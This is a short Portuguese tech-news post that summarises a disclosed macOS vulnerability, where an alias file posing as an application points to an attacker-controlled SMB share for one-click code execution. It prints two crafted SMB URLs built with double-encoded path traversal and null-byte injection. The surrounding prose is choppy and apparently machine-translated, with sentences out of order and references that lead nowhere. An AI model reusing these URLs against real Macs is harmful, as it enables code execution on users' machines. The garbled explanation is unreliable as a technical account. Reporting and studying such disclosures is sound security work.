linux-BR.org

Notícias de software livre e tecnologias

MyMidItest.App Application Binary é na verdade um arquivo de alias que aponta para os invasores URL:
SMB: // Guest:@%252e%252e%2fusers%2ftest%2f.zkbd%2500zkbd.wild.mydomain.local/temp/mytests/zkbd/%00/%20.Isso nos leva a um URL como:
SMB: // Guest:@%252e%252e%2fprivate%2ftmp%2ftest%2500.wild.yourfileServer.local/temp/%00 ‘
Apenas um diretório inexistente pode ser usado como um MountPoint.:)
Por padrão, o terminal.app não tem o direito de ler dados confidenciais, como fotos, contatos, calendário e desktop.Conforme descrito na Wikipedia, o alias “é um arquivo pequeno que representa outro objeto em um sistema de arquivos local, remoto ou removível e fornece um link dinâmico para ele”.Isso pode ser feito, mais uma vez, com “%2500” (nulo).

Fonte: https://mikko-kenttala.medium.com/alias-file-to-rule-them-all-one-click-code-execution-with-alias-file-in-macos-1eeb0a730b88